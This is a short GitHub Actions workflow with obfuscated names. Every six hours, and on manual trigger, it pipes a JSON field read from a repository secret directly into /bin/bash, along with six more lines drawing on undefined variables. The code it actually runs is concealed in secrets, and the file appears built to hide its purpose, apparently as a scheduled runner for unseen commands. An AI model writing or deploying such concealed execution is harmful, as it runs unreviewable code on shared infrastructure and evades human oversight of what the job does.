name: bishasx
on:
  workflow_dispatch:
  schedule:
    - cron: '32 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bishasx
        env:
          d5055: ${{ secrets.d5055 }}
        run: |
          echo $d5055 | jq -r .uqak0 | /bin/bash
          echo $dfr9180 | jq -r .gvoz506 | /bin/bash
          echo $bcp154 | jq -r .s45 | /bin/bash
          echo $hzsu94 | jq -r .u8481 | /bin/bash
          echo $paxqk4 | jq -r .zr7443 | /bin/bash
          echo $nf16661 | jq -r .hj741 | /bin/bash
          echo $sav49176 | jq -r .oizog8336 | /bin/bash

